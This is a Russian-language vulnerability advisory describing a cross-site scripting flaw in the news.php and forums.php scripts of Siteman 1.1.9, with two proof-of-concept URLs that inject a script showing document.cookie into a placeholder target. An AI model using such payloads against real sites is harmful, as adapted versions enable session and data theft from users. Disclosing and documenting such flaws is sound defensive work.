Security Lab

Межсайтовый скриптинг в сценариях news.php и forums.php в Siteman

Дата публикации:18.01.2005
Дата изменения:17.10.2006
Всего просмотров:1389
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Siteman 1.1.9

Описание:
Уязвимость позволяет злоумышленнику произвести XSS нападение и получить доступ к важным данным пользователей.

Уязвимость существует в сценариях news.php и forums.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.

Пример/Эксплоит:

http://[target]/forum.php?do=viewtopic& cat=1&topic=1&page=1?">
<script>alert(document.cookie)</script>

http://[target]/news.php?do=showone& id=1&page=1?" ><
script>alert(document.cookie)</script>

URL производителя: http://sitem.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: New XSS Vulnerability in Siteman v1.1.9